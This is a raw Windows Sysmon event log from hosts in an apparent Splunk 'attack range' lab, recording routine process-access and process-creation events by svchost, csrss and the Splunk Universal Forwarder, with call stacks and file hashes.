12:29:31.182{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046294Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:31.182{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046293Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:31.182{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046292Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:31.182{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046291Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:31.182{FE4C2B44-D9F3-63C7-0500-00000000AF02}408524C:\Windows\system32\csrss.exe{FE4C2B44-E62B-63C7-8306-00000000AF02}4536C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000046290Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:31.182{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E62B-63C7-8306-00000000AF02}4536C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000046289Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:31.183{FE4C2B44-E62B-63C7-8306-00000000AF02}4536C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018598Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:32.951{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E62C-63C7-3A02-00000000B002}372C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018597Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:32.951{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018596Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:32.951{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018595Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:32.951{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018594Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:32.951{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018593Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:32.951{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018592Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:32.951{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018591Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:32.951{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018590Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:32.951{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018589Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:32.951{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018588Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:32.951{E5A8D418-DC43-63C7-0500-00000000B002}416964C:\Windows\system32\csrss.exe{E5A8D418-E62C-63C7-3A02-00000000B002}372C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018587Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:32.951{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E62C-63C7-3A02-00000000B002}372C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018586Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:32.953{E5A8D418-E62C-63C7-3A02-00000000B002}372C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000018585Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:32.842{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59EDC718405364FBC8F900631BF3BDC3,SHA256=9DF03FEA1BE69F2390C1B3175AD391C6132089058B14123484E6E1E8B40D4A5A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000046334Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:32.863{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C978D68AE916F4593C856E01298F95D9,SHA256=89E689960541E97E5627E89C1DCC71B2C495D16B29FA4980F716DA7E4FA700B5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000046333Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:32.519{FE4C2B44-E62C-63C7-8406-00000000AF02}55361164C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046332Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:32.378{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E62C-63C7-8406-00000000AF02}5536C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046331Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:32.378{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046330Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:32.378{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046329Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:32.378{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046328Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 